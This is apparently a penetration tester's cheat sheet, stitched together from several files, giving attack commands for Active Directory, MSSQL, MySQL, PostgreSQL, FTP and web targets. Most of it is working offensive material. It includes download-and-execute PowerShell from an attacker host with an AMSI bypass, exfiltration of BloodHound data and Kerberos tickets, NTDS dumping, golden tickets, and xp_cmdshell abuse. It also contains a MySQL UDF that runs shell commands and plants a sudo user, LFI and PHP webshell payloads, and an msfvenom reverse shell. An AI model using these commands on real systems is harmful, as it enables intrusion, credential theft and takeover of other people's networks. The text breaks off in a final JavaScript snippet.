            ~PS> [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

        `` Controllers

            ~> nltest.exe /dclist:VAR_DOMAIN

        `` Trusts

            ~> nltest.exe /trusted_domains

            ~PS> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

        `` Delegation

            -- Powerview
            ~PS> Get-DomainUser -TrustedToAuth
            ~PS> Get-DomainComputer -TrustedToAuth

            -- Powerview: find computers accessed by admin users
            ~PS> Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

`` Automated analysis

    `` Bloodhound

        ~PS> mkdir C:\loot
        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/SharpHound.ps1')
        ~PS> Invoke-Bloodhound -CollectionMethod All -Domain VAR_TARGET_DOMAIN -OutputDirectory C:\loot -ZipFileName blood.zip
        ~PS> IEX(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/blood.zip', 'C:\loot\blood.zip')

        -- Using specific credentials
        ~PS> Invoke-Bloodhound -CollectionMethod All -LDAPUser VAR_USERNAME -LDAPPass VAR_PASSWORD

    `` Other noteworthy scripts

        - FindTrustedAndSPNAccounts.vbs
        - FindAllSvc.ps1
        - ACLight2.ps1
        - Get-ExploitableSystems.psm1

`` Lateral Movement

    `` PTH and mimikatz

        ~PS> mimikatz.exe # sekurlsa::pth /user:VAR_USERNAME /domain:VAR_TARGET_DOMAIN /ntlm:VAR_NT_HASH /run:"mstsc.exe /restrictedadmin"

    `` Native

        ~PS> Enter-PSSession -ComputerName VAR_TARGET_HOST

    `` Push/pop location

        ~PS> Push-Location \\VAR_TARGET_HOST\sysvol
        ~PS> gci * -Include *.xml,*.ini,*.txt,*.cfg,*.bat,*.ps1,*.psm,*.psd,*.vbs,*.cmd -Recurse -EA SilentlyContinue | Select-String password
        ~PS> Pop-Location

    `` Runas

        -- /netonly does not validate the credentials locally: the new shell still runs as the current user and the supplied creds are used only for outbound network auth, so a typo surfaces only on the first remote access
        ~> runas.exe /netonly /user:VAR_DOMAIN\VAR_USERNAME cmd.exe

    `` Find machines the current user has admin access to

        -- Powerview
        ~PS> Find-LocalAdminAccess

    `` WMI

        ~$ proxychains impacket-wmiexec.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_DOMAIN/VAR_USERNAME@VAR_TARGET_HOST

    `` PsExec

        ~$ impacket-psexec -hashes VAR_LM_HASH:VAR_NT_HASH VAR_USERNAME@VAR_TARGET_HOST
        ~$ impacket-psexec VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD@VAR_TARGET_HOST

    `` WinRM

        ~> winrs.exe -r:VAR_TARGET_HOST cmd.exe
        
        ~$ evil-winrm --user VAR_USERNAME --hash VAR_NT_HASH --ip VAR_TARGET_HOST
        ~$ evil-winrm --user VAR_USERNAME --password VAR_PASSWORD --ip VAR_TARGET_HOST

    `` NTLM Relay

        -- Relay to SMB only works against targets that do not require SMB signing; build the list first, e.g. crackmapexec smb VAR_TARGET_RANGE --gen-relay-list targets.txt (then -tf targets.txt)
        ~$ proxychains impacket-ntlmrelayx --no-http-server -smb2support -t VAR_TARGET_HOST -c 'dir'

    `` Dump credentials - NTDS

        ~> powershell.exe "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\loot\ntds' q q"
        ~$ impacket-secretsdump -system ntds/registry/SYSTEM -security ntds/registry/SECURITY -ntds ntds/Active\ Directory/ntds.dit local

        ~$ impacket-secretsdump -just-dc-ntlm VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD@VAR_TARGET_HOST

    `` Tickets

        `` Request

            -- Powerview
            ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')
            ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/powerview.ps1')
            ~PS> Add-Type -AssemblyName System.IdentityModel
            -- setspn takes the domain directly after -T (there is no -Domain switch)
            ~PS> Get-ForestGlobalCatalog | %{ setspn.exe -T $_.Domain -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } }

        `` Cracking

            -- Export
            ~PS> mimikatz.exe # kerberos::list /export

            -- Upload
            ~> powershell.exe -exec bypass "(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/sql01.kirbi', 'C:\loot\WEB01$@MSSQLSvc~sql01~1433.kirbi')"

            -- Using https://github.com/nidem/kerberoast
            ~$ ~/lib/kerberoast/tgsrepcrack.py VAR_WORDLIST sql01.kirbi

            -- Using John The Ripper (the converter ships with JtR jumbo as kirbi2john.py)
            ~$ /usr/share/john/kirbi2john.py sql01.kirbi > sql01.hash
            ~$ john --format=krb5tgs --wordlist=VAR_WORDLIST sql01.hash

        `` From the attacking box
        
            -- Convert and use
            ~$ ticket_converter.py ticket.kirbi ticket.ccache
            ~$ kdestroy
            ~$ cp ticket.ccache ~/ticket.ccache
            ~$ export KRB5CCNAME=/home/user/ticket.ccache
            ~$ klist

            -- Request ticket for a service
            ~$ kvno MSSQLSvc/VAR_TARGET_HOST:1433   # the SPN is service/host-FQDN:port, e.g. MSSQLSvc/sql01.VAR_TARGET_DOMAIN:1433

        `` Golden (using KRBTGT NTLM password hash)

            -- NOTE: since the Nov 2021 KDC hardening (CVE-2021-42287, PAC requestor) patched DCs reject TGTs for accounts that do not exist, so use a real username plus its RID (/id:) rather than 'whatever'. /sids with the root-domain 519 RID injects Enterprise Admins via SID history, which is commonly alerted on.

            ~PS> Get-DomainSID -Domain VAR_DOMAIN
            ~PS> mimikatz.exe # lsadump::dcsync /domain:VAR_DOMAIN /user:krbtgt
            ~PS> mimikatz.exe # kerberos::golden /user:whatever /domain:VAR_DOMAIN /sid:S-1-5-21-xxx /krbtgt:VAR_NT_HASH /sids:S-1-5-21-xxx-519 /ptt
            ~> PsExec64.exe \\rdc02 cmd

    `` Changing permissions

        -- Powerview: add all permissions to VAR_NAME
        ~PS> Add-DomainObjectAcl -TargetIdentity 'VAR_NAME' -Rights All -PrincipalIdentity VAR_USERNAME

        -- Powerview: add VAR_USERNAME to a group VAR_NAME
        ~PS> Add-DomainGroupMember -Identity 'VAR_NAME' -Members 'VAR_USERNAME'
        ~PS> Get-DomainGroupMember 'VAR_NAME'

        -- Powerview: give replication rights
        ~PS> Add-ObjectACL -PrincipalIdentity VAR_USERNAME -Rights DCSync

    `` LAPS

        -- Is LAPS enabled?
        ~> reg.exe query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

        ~PS> IEX(New-Object Net.Webclient).DownloadString('http://VAR_ATTACKER_HOST:8001/LAPSToolkit.ps1')
        ~PS> Get-LAPSComputers
        ~PS> Find-LAPSDelegatedGroups

    `` Password in Group Policy Preferences

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Get-GPPPassword.ps1'); Get-GPPPassword

    `` Permissions

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Invoke-ACLPwn.ps1')

`` Tokens

    `` Manipulation

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Invoke-TokenManipulation.ps1') 

    `` Impersonation

        ~PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
        ~PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity 'VAR_USERNAME'
        ~PS> $context = $idToImpersonate.Impersonate()
        ~PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name

        -- Using Incognito
        -- Standalone build: list the tokens available in the current process context, then spawn under the chosen one
        ~> C:\tools\Incognito.exe list_tokens -u
        ~> C:\tools\Incognito.exe execute -c "VAR_DOMAIN\VAR_USERNAME" cmd.exe

`` Spraying

    `` WMI

        ~PS> $ds = [adsisearcher]"((objectCategory=computer))"
        ~PS> $comps = $ds.FindAll()

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString("http://VAR_ATTACKER_HOST:8001/Invoke-WMIExec.ps1")  
        ~PS> foreach ($comp in $comps) {
        ~PS>     $compname = $comp.properties.dnshostname
        ~PS>     if ($compname) { Invoke-WMIExec -Target $compname -Username VAR_USERNAME -Hash VAR_NT_HASH -Command "whoami" -Verbose }
        ~PS> }

    `` crackmapexec

        ~$ crackmapexec VAR_TARGET_RANGE -x whoami --timeout 5 -d VAR_TARGET_DOMAIN -u VAR_USERNAME -H VAR_LM_HASH:VAR_NT_HASH
        ~$ crackmapexec smb VAR_TARGET_RANGE -u VAR_USERNAME -H VAR_LM_HASH:VAR_NT_HASH --local-auth

    `` Impacket

        for ip in $(seq 1 254); do
            impacket-smbexec.py -hashes VAR_LM_HASH:VAR_NT_HASH $VAR_TARGET_DOMAIN/VAR_USERNAME@VAR_TARGET_NETWORK$ip
        done


================================================
FILE: Target.Host.Service.AMQP.txt
================================================
`` RabbitMQ

    ~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST


================================================
FILE: Target.Host.Service.DB.MSSQL.txt
================================================
`` Scanning

    ~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables

`` Password Bruteforcing

    ~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
    ~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql

`` TDS Versions

    - 7.0
        - SQL Server 7.0
    - 7.1
        - SQL Server 2000
    - 7.1 Revision 1
        - SQL Server 2000 SP1
    - 7.2
        - SQL Server 2005
    - 7.3.A
        - SQL Server 2008
    - 7.3.B
        - SQL Server 2008 R2
    - 7.4
        - SQL Server 2012
        - SQL Server 2014
        - SQL Server 2016
        - SQL Server 2017
        - SQL Server 2019

`` Remote console

    ~$ vim ~/.sqshrc
    ~$ sqsh -S mssql1

`` Capturing NTLM

    > EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test";

`` Change sa password

    ~> net stop MSSQL$SQLEXPRESS
    ~> net start MSSQL$SQLEXPRESS /m sqlcmd
    ~> sqlcmd
        > ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master]
        > GO
        > USE [master]
        > GO
        > ALTER LOGIN [sa] WITH CHECK_POLICY = OFF;
        > GO
        > ALTER LOGIN [sa] WITH PASSWORD=N'sa';
        > GO
    ~> net stop MSSQL$SQLEXPRESS
    ~> net start MSSQL$SQLEXPRESS

`` Linked servers

    `` List
        
        > EXEC sp_linkedservers;

    `` Execute on linked server

        > SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version')

    `` Remote execution

        > EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST
        > EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST
        > EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST

`` With metasploit

    > use auxiliary/admin/mssql/mssql_sql
    > set USERNAME VAR_USERNAME
    > set PASSWORD VAR_PASSWORD
    > set DOMAIN VAR_DOMAIN
    > set USE_WINDOWS_AUTHENT yes
    > set RHOSTS VAR_TARGET_HOST
    > set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'"
    > run

`` xp_cmdshell

    `` The basic approach

        > exec sp_configure "show advanced options", 1
        > reconfigure
        > exec sp_configure "xp_cmdshell", 1
        > reconfigure
        > xp_cmdshell "whoami"

    `` Download and execute PowerShell

        > xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");"

    `` wget.vbs

        xp_cmdshell 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs'
        go
        xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs'
        go
        xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs'
        go
        xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'
        go
        xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs'
        go
        xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs'
        go
        xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs'
        go
        xp_cmdshell 'echo Err.Clear >> wget.vbs'
        go
        xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
        go
        xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs'
        go
        xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs'
        go
        xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs'
        go
        xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs'
        go
        xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs'
        go
        xp_cmdshell 'echo http.Send >> wget.vbs'
        go
        xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs'
        go
        xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
        go
        xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs'
        go
        xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs'
        go
        xp_cmdshell 'echo strData = "" >> wget.vbs'
        go
        xp_cmdshell 'echo strBuffer = "" >> wget.vbs'
        go
        xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs'
        go
        xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs'
        go
        xp_cmdshell 'echo Next >> wget.vbs'
        go
        xp_cmdshell 'echo ts.Close >> wget.vbs'
        go

    `` Using sqsh

        ~$ cat ~/.freetds.conf
        [mssql1]
                host = VAR_TARGET_HOST
                port = 27900
                tds version = 8.0
        ~$ sqsh -S mssql1 -U sa
        > exec sp_configure "show advanced options", 1
        > go
        > reconfigure
        > go
        > exec sp_configure "xp_cmdshell", 1
        > go
        > reconfigure
        > go
        > xp_cmdshell "whoami"
        > go
        > xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add"
        > xp_cmdshell "net localgroup administrators VAR_USERNAME /add"


================================================
FILE: Target.Host.Service.DB.MySQL.txt
================================================
`` Scanning

    ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST

    -- NOTE: mysql-enum is unreliable

`` Password Bruteforcing

    ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST

    -- With a list of targets
    ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql

`` Dump

    ~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql

`` Extension upload

    SELECT @@plugin_dir;

    SELECT 0x7f454c...00000 into dumpfile "/var/lib/mysql/udf.so";

    CREATE function sys_eval returns string soname 'udf.so';
    SELECT * from mysql.func where name = 'sys_eval';
    SELECT sys_eval('dir');
    DROP function sys_eval;

    echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'

`` raptor.c

    #include <stdio.h>
    #include <stdlib.h>

    /* Result-type tags used for UDF arguments and return values. */
    enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

    /*
     * Argument vector handed to the UDF on each call.
     * NOTE(review): this and UDF_INIT below are local stand-ins for the MySQL
     * UDF interface types (the file includes only stdio/stdlib); the field
     * order is what the server expects at the ABI level, so do not reorder
     * fields -- confirm against the server's own header.
     */
    typedef struct st_udf_args {
        unsigned int arg_count; // number of arguments
        enum Item_result *arg_type; // pointer to item_result
        char **args; // pointer to arguments
        unsigned long *lengths; // length of string args
        char *maybe_null; // 1 for maybe_null args
    } UDF_ARGS;

    /* State block that both do_cmd_init and do_cmd receive as their first parameter. */
    typedef struct st_udf_init {
        char maybe_null; // 1 if func can return NULL
        unsigned int decimals; // for real functions
        unsigned long max_length; // for string functions
        char *ptr; // free ptr for func data
        char const_item; // 0 if result is constant
    } UDF_INIT;

    /*
     * Main UDF entry point.
     * Passes args->args[0] to system(3) when exactly one argument was
     * supplied; any other argument count is a no-op.  Always returns 0 and
     * discards system()'s exit status.
     * initid, is_null and error are part of the UDF signature but unused here.
     * Defensive note: once registered, the function is visible as a row in
     * mysql.func and as a shared object in the server's plugin directory
     * (see the SELECT on mysql.func and @@plugin_dir in the notes above).
     */
    int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
    {
        (void)initid;
        (void)is_null;
        (void)error;

        if (args->arg_count == 1) {
            system(args->args[0]);
        }
        return 0;
    }

    /*
     * Init hook paired with do_cmd.  Performs no setup and returns 0
     * unconditionally; all three parameters are unused.
     */
    char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
    {
        (void)initid;
        (void)args;
        (void)message;
        return 0;
    }


    $ gcc -fPIC -g -c raptor.c
    $ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc
    $ xxd -p -c `stat --format="%s" raptor.so` raptor.so

    mysql> SELECT '<output of above command>' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'
    mysql> CREATE function do_cmd returns integer soname "raptor.so";
    mysql> SELECT do_cmd("echo 'root:root'|chpasswd");


    gcc -g -c raptor_udf2.c
    gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    mysql -u root
    mysql> use mysql;
    mysql> create table foo(line blob);
    mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
    mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
    mysql> create function do_system returns integer soname 'raptor_udf2.so';
    mysql> select * from mysql.func;
    +-----------+-----+----------------+----------+
    | name      | ret | dl             | type     |
    +-----------+-----+----------------+----------+
    | do_system |   2 | raptor_udf2-2.so | function |
    +-----------+-----+----------------+----------+
    mysql> select do_system('adduser toor');
    mysql> select do_system('echo "toor    ALL=(ALL) ALL" >> /etc/sudoers');
    mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd');


================================================
FILE: Target.Host.Service.DB.PostgreSQL.txt
================================================
`` Scanning

    ~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv

`` Password Bruteforcing

    ~$ nmap -p 5432 --script pgsql-brute --script-args userdb=users.txt,passdb=VAR_WORDLIST VAR_TARGET_HOST
    ~$ hydra -L users.txt -V -P VAR_WORDLIST VAR_TARGET_HOST postgres

`` Dump

    -- Dump single database
    ~$ pg_dump dbname | gzip > dump.gz

    -- Dump cluster
    ~$ pg_dumpall | gzip > dump.gz

`` Database access

    ~$ psql -h VAR_TARGET_HOST -U postgres


================================================
FILE: Target.Host.Service.FTP.txt
================================================
`` Scanning

    ~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST

`` Password Bruteforcing

    ~$ nmap -n -v -p 21 --script ftp-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
    ~$ ncrack -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -T 5 VAR_TARGET_HOST -p 21
    ~$ medusa -h VAR_TARGET_HOST -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -M ftp

`` Massive download

    ~$ wget --recursive --ftp-user=anonymous --ftp-password=any --no-passive-ftp ftp://VAR_TARGET_HOST


================================================
FILE: Target.Host.Service.HTTP.txt
================================================
`` Initial

    `` nikto

        `` Fewer defaults, less intense, no dictionary

            ~$ nikto -h http://VAR_TARGET_HOST -Plugins "outdated;shellshock;msgs;cookies;cgi;put_del_test;headers;multiple_index;httpoptions;ssl;robots;origin_reflection"

        `` All batteries included

            ~$ nikto -h http://VAR_TARGET_HOST
            ~$ nikto -h http://VAR_TARGET_HOST -useproxy http://VAR_PROXY_HOST:8881

    `` pukpuk

        ~$ pukpuk -c VAR_TARGET_CIDR -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 81/http 443/https 8000/http 8080/http 8443/https

        -- Basic grabbing after running the scan_top.sh script, using the resulting HTTP file
        ~$ pukpuk -l VAR_FILENAME -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 443/https 4443/https 8000/http 8080/http 8081/http 8082/http 8888/http 8443/https 9443/https

        -- Extended port list and read targets from file
        ~$ pukpuk -l VAR_TARGET_LIST -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 81/http 82/http 83/http 443/https 1080/http 1443/https 4443/https 7443/https 8000/http 8001/http 8008/http 8080/http 8081/http 8088/http 8443/https 8888/http 9000/http 9080/http 9443/https 10080/http 10443/https 11443/https 12443/https

    `` nmap

        ~$ nmap VAR_TARGET_HOST -p 80 -v -sV --script "http-sitemap-gen*,http-methods,http-mobile*,http-open*,http-sql*,http-userdir*,http-vhosts,http-webdav*,http-iis*,http-enum*,http-frontpage*,http-useragent*"

`` Path Discovery / Crawling

    ~$ hakrawler -url VAR_TARGET_HOST -depth 1

`` Path Bruteforcing

    `` Look for "hidden" resources, home dirs, useful files etc. Complete step-by-step chain.

        ~$ export USERAGENT="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
        ~$ export TARGET=https://VAR_TARGET_HOST
        ~$ export EXTENSIONS=$(tr '\n' ',' < ~/lib/brutas/brutas-http-files-extensions-common.txt)

        ~$ ffuf -w VAR_WORDLIST -H "$USERAGENT" -u $TARGET/FUZZ -mc 200
        ~$ ffuf -w VAR_WORDLIST -H "$USERAGENT" -u $TARGET/FUZZ -e $EXTENSIONS -mc 200
        ~$ ffuf -w VAR_WORDLIST -recursion -recursion-depth 5 -H "$USERAGENT" -u $TARGET/FUZZ -e '/' -mc 200,204,401,403,405
        ~$ ffuf -w VAR_WORDLIST -recursion -recursion-depth 5 -H "$USERAGENT" -u $TARGET/.FUZZ -e '/' -mc 200,204,401,403,405

    `` Using a list of paths

        ~$ while read lin; do ffuf -w ~/lib/brutas/brutas-http-files.txt -H "$USERAGENT" -u $lin/FUZZ -e $EXTENSIONS -mc 200; done < paths.txt

    `` Generic, follow redirects (-r), adaptive (-ac), silent (-s) and recursive (-recursion)

        ~$ ffuf -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ -r -ac -s -recursion

    `` Slow and peaceful

        ~$ ffuf -t 10 -p 1 -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ

    `` Less intense and a little bit randomized

        ~$ ffuf -fc 403,302 -p "0.1-2.0" -t 4 -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ

    `` Match OK 200 only

        ~$ ffuf -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ -mc 200

    `` Match based on response size

        ~$ ffuf -w VAR_WORDLIST -u https://VAR_TARGET_HOST/script.php?FUZZ=test_value -fs VAR_INTEGER

    `` HTTP header fuzzing

        ~$ ffuf -w VAR_WORDLIST -u https://VAR_TARGET_HOST -H "Host: FUZZ"

`` LFI

    `` Automated

        ~$ dotdotpwn -m http-url -k "root:" -u "http://VAR_TARGET_HOST/?url=TRAVERSAL" -o unix -d 8 -f "/etc/passwd"
        ~$ dotdotpwn -m http-url -k "mci extensions" -u "http://VAR_TARGET_HOST/?url=TRAVERSAL" -o windows -d 8 -f "windows\win.ini"

    `` Basic

        ?file=../../../../../../../../../var/log/apache/error.log
        ?file=/etc/passwd/../../../../../../../../../../../../../../../../../..

    `` Path Truncation

        .php?filename=../../../etc/passwd/././././././././/././././././././././[...]

    `` Nullbyte Injection

        ?file=../../../../etc/passwd%00
        ?file=../../../../etc/passwd%00jpg

    `` Poisoning

        `` Headers

            .php?filename=../../../proc/self/environ
            User-Agent: <?=phpinfo(); ?>

            .php?filename[]= HTTP/1.1
            Referer: <?=phpinfo();?>

            .php?filename=../../../var/log/nginx/error_log

        `` SSH

            ~$ ssh <?=phpinfo();?>@VAR_ATTACKER_HOST
            .php?filename=../../../var/log/auth.log

        `` SMTP

            ~$ mail -s "<?=phpinfo();?>" www-data@VAR_ATTACKER_HOST < /dev/null
            .php?filename=../../../var/log/www-data

    `` curl

        ~$ curl 'http://VAR_TARGET_HOST/cgi-bin/admin.cgi' -i -s > before
        ~$ curl 'http://VAR_TARGET_HOST/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd' -i -s > after
        ~$ diff before after

`` Automated

    `` Generic

        ~$ wapiti -u http://VAR_TARGET_HOST/

        ~$ commix --url="http://VAR_TARGET_HOST/?url=INJECT_HERE"
        ~$ commix --url="http://VAR_TARGET_HOST/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=VAR_TARGET_HOST,ip_dst=VAR_TARGET_HOST"
        ~$ commix --url="http://VAR_TARGET_HOST/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://VAR_TARGET_HOST/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
        ~$ commix --url="http://VAR_TARGET_HOST:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" --technique="f" --root-dir="/"
        ~$ commix --url="http://VAR_TARGET_HOST/cgi-bin/status/" --shellshock
        ~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
        ~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
        ~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/referer/referer(classic).php" --level=3
        ~$ commix --url="http://VAR_TARGET_HOST/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
        ~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
        ~$ commix --url="http://VAR_TARGET_HOST/cgi-bin/status" --shellshock --proxy="VAR_PROXY_HOST:3128"

    `` Wordpress

        ~$ wpscan --url VAR_TARGET_HOST -e vt,vp
        ~$ wpscan --url http://VAR_TARGET_HOST/ --wordlist VAR_WORDLIST --username VAR_USERNAME

    `` Joomla

        joomscan

    `` Fingerprinting

        ~$ python3 ./wig.py http://VAR_TARGET_HOST/

`` Ideas

    `` Bypassing auth with keep-alive

        ~$ printf 'GET / HTTP/1.1\r\nConnection: keep-alive\r\n\r\n' | ncat --ssl -v VAR_TARGET_HOST VAR_TARGET_PORT

    `` BusyBox chain

        ~$ curl -v --user 'VAR_USERNAME:VAR_PASSWORD' 'http://VAR_TARGET_HOST/command.cgi?ps|wget http://VAR_ATTACKER_HOST/tcpdump -P /tmp%26%26wget http://VAR_ATTACKER_HOST/busybox-mipsel -P /tmp%26%26chmod %2Bx /tmp/tcpdump%26%26chmod %2Bx /tmp/busybox-mipsel%26%26/tmp/tcpdump -n -i any udp -w -|/tmp/busybox-mipsel nc VAR_ATTACKER_HOST 10000'

    `` Node.js

        http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]

    `` Perl

        value='||eval `echo -e "YXdrIC...V2L251bGwK" | openssl enc -a -d`;#'

    `` PHP wrappers

        ~$ curl -s --data "<?system('ls -la');?>" "http://VAR_TARGET_HOST/script.php?path=php://input%00" | html2text
        .php?page=expect://ls
        .php?page=php://filter/resource=/etc/passwd
        .php?page=php://filter/convert.base64-encode/resource=/etc/passwd
        .php?page=zip:///var/www/images/tmp.zip%23tmp
        .php?page=php://filter/read=zlib.deflate/read=convert.base64-encode/resource=/etc/passwd
        .php?page=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo==&cmd=ls
        .php?page=data:text/plain,<?system($_GET['cmd']);?>&cmd=ls

        `` Python decompress

            >>> zlib.decompress(base64.b64decode(req), -15)

    `` IIS

        ~$ cadaver http://VAR_TARGET_HOST
        dav:/> put alter.asp alter.txt
        dav:/> copy alter.txt alter.asp;.txt

    `` RCE

        ~$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=VAR_ATTACKER_HOST LPORT=80 -f elf > /var/www/html/index.html
        ~$ curl "http://VAR_TARGET_HOST/sync?opt=' w\get VAR_ATTACKER_HOST -P /tmp'
        ~$ curl "http://VAR_TARGET_HOST/sync?opt=' c\hmod +x /tmp/index.html'
        ~$ curl "http://VAR_TARGET_HOST/sync?opt=' /tmp/index.html'

    `` XHR

        // Issues a synchronous (third argument false) TRACE request to the target
        // and shows the response body in an alert when the status is 200.
        var xhr = new XMLHttpRequest();
        xhr.open('TRACE', 'http://VAR_TARGET_HOST/', false);
        xhr.send(null);
        if (xhr.status === 200) {
            alert(xhr.responseText);
